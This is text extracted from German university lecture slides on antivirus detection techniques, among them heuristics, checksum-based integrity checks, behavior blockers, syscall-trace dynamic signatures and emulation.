Viren können damit (potentiell) gefunden werden, vollständige Analyse nicht nötig Hauptproblem: zuviele false positives Negative Heuristiken: Suche nach Code, der in Viren garantiert nicht vorkommt (z.b. Dialogboxen) Spektrale Analyse: Histogramm der in einem Programm befindlichen Instruktionen 87 / / 95 Virentypische Merkmale (Auswahl) Integritätsprüfungen Junk Code Dekryptoren Selbstmodifizierender Code virustypischer Code Beispiel: Suche nach dem Marker des PE-Binärformats cmp ax, "MZ" Instruktionen, die der Compiler nicht generiert Ausführung startet am Ende einer Datei (Sprung dahin) Manipulation von Interruptvektoren (MS-DOS) Nutzung undokumentierter Funktionen Zeichenketten mit Obszönitäten ;-) Idee: Viren modifizieren Dateien (Ausnahme?) Bildung einer Checksumme über jeder uninfizierten Datei, Speicherung der Checksumme in Datenbank, späterer Vergleich gespeicherter mit aktueller Checksumme. Realisierungsmöglichkeiten:. externes Programm, periodischer Aufruf, 2. Selbsttest in ausführbaren Dateien, 3. impliziter Test durch OS beim Aufruf (Integrity Shell) 89 / 95 9 / 95 5

16 Integritätsprüfungen Bewertung Behavior Blockers/Monitors Idee: Beobachtung der Aktivität von Prozessen und Blockierung/Meldung von verdächtigen Aktivitäten für bekannte und unbekannte Viren möglich Detektion erst nach Infektion unmöglich, in legal modifizierten oder neuen Dateien Viren zu finden Ursache der Infektion nicht ermittelbar keine Virusidentifikation Datenbank ist ein bevorzugtes Angriffsziel von Retroviren erlaubt potentiell die Ausführung eines Virus Verschlüsselung von Viren wirkungslos nur relevante Operationen beobachten (Aufwand!), z.b. I/O, Systemrufe nachteilig: Payload wird u. U. ausgeführt Beispiel einer verdächtigen Aktion:. Öffnen einer Binärdatei zum Lesen und Schreiben 2. Einlesen des Teils des File Headers, der Startadresse enthält 3. Schreiben des zuvor eingelesenen Teils 4. Seek zum Ende der Datei und Append-Operation 9 / / 95 Dynamische Signaturen Emulation Idee: Ableitung von Signaturen aus der Sequenz relevanter Systemereignisse (z. B. Systemrufe) und Anwendung der statischen Suchverfahren open open read write read write read write close close Syscall Trace open, open, read open, read, write read, write, read write, read, write read, write, close write, close, close dynamische Signaturen (k=3) open, open open, read read, write write, read write, close close, close dynamische Signaturen (k=2) Idee: Code Nutzung eines CPU-Simulators, um Viruscode ungefährdet ausführen zu können innerhalb der Anti-Viren-Software komplexer Code zu verstehen Abbildung: Beispiel (kurzer) dynamischer Signaturen 93 / / 95 Was haben wir gelernt? Techniken der Virusdetektion Scanning Exakte Identifikation Statische Heuristiken Integritätsprüfungen Emulation Nur die Kombination aller Techniken ist erfolgversprechend. 95 / 95 6